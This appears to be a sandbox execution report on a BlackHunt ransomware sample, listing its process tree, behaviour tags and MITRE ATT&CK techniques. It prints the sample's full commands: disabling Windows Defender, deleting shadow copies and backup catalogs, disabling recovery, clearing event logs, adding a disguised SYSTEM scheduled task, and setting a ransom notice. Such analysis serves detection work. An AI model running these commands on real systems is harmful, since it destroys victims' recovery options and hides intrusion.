  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:3280
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - Modifies Windows Defender Real-time Protection settings
    PID:1644

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  PID:1560
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID:3708
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:4424
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    PID:836

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  PID:2172
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    PID:4792

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:4900
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    PID:5116

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:4312
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    PID:4376

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  - Suspicious use of WriteProcessMemory
  PID:1984
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    PID:1256

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  PID:1980
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID:4392

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  - Suspicious use of WriteProcessMemory
  PID:3736
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    PID:1616

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  PID:4176
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    PID:4400

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  PID:3744
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    PID:4652

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:760
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID:3420

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  PID:1228
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    PID:224
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  PID:4476
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    PID:4468

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:3248
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID:4524

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  PID:4912
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    PID:4412

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  PID:4580
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    PID:3356

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  PID:4800
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    PID:3204

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  PID:4768
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    PID:4184

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  PID:4200
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    PID:5024

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  PID:3160
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    PID:2712

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F
  PID:1396
    C:\Windows\system32\schtasks.exe
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F
    - Creates scheduled task(s)
    PID:3144

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  PID:4204
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    PID:3536

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  - Modifies registry class
  PID:4844
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    PID:2452
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  PID:2364
    C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2840

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  PID:3528
    C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:348

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  PID:4836
    C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    - Interacts with shadow copies
    PID:3960

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  PID:1804
    C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Suspicious use of WriteProcessMemory
    PID:1560
    C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    - Interacts with shadow copies
    PID:2924

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  PID:2516
    C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit
    PID:2288

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  PID:1280
    C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    - Interacts with shadow copies
    PID:4548

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  PID:4392
    C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
    PID:8236

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  PID:3000
    C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    - Deletes NTFS Change Journal
    PID:9572
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  - Suspicious use of WriteProcessMemory
  PID:2172
    C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    - Deletes backup catalog
    PID:9564

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  PID:468
    C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    PID:8224

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
  PID:14600
    C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /D M:\
    - Enumerates connected drives
    PID:14296

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
  PID:14048
    C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /D C:\
    PID:14272

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
  PID:10860
    C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /D F:\
    - Enumerates connected drives
    PID:2420

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
  PID:13352
    C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Setup
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:13296

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
  PID:6340
    C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl System
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:14144

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
  PID:6580
    C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Application
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:14812

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
  PID:6540
    C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Security
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:9176
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
  PID:14212
    C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl Security /e:false
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:10616

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  PID:14872
    C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    - Interacts with shadow copies
    PID:14700

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  PID:10144
    C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
    PID:13972

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  PID:14876
    C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit
    PID:14172

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  PID:14488
    C:\Windows\system32\fsutil.exe
    fsutil.exe usn deletejournal /D C:
    - Deletes NTFS Change Journal
    PID:14036

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  PID:14584
    C:\Windows\system32\wbadmin.exe
    wbadmin.exe delete catalog -quiet
    - Deletes backup catalog
    PID:11672

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  PID:10856
    C:\Windows\system32\schtasks.exe
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    PID:8136

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  PID:15020
    C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    PID:15280

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  PID:14860
    C:\Windows\system32\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    PID:14924
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  PID:14840
    C:\Windows\system32\schtasks.exe
    SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    PID:14932

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  PID:7284
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    PID:15016

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
  PID:1352
    C:\Windows\system32\taskkill.exe
    taskkill /IM mshta.exe /f
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:14628

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  PID:15060
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    PID:15296

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  PID:15272
    C:\Windows\system32\notepad.exe
    notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    PID:10384

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
  - Checks computer location settings
  - Modifies registry class
  PID:12412
    C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    PID:5868

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"
  PID:15112
    C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    - Runs ping.exe
    PID:7572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2436

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
- Suspicious use of AdjustPrivilegeToken
PID:7536

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
PID:1380

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
- Checks SCSI registry key(s)
PID:5540
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads